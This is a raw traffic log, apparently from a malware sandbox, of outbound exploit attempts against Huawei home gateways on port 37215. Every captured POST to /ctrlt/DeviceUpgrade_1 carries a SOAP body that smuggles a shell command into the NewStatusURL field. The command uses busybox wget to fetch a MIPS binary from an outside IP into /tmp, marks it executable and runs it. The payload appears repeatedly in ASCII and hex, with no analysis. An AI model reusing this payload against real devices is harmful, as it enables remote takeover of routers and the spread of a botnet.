                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14192.168.2.1438014197.30.81.1437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660749912 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15192.168.2.1451116197.115.91.8037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660818100 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16192.168.2.144479641.85.57.17437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660835981 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17192.168.2.1456634156.149.180.3537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660871029 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18192.168.2.1434334156.67.95.19337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660897017 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19192.168.2.144482641.229.152.15037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660938025 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192.168.2.1440200197.92.82.21037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660974979 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21192.168.2.1448698156.81.56.9237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660976887 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22192.168.2.145398441.20.102.10837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661084890 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23192.168.2.145318641.68.188.19137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661099911 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24192.168.2.1445986156.97.90.22537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661122084 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
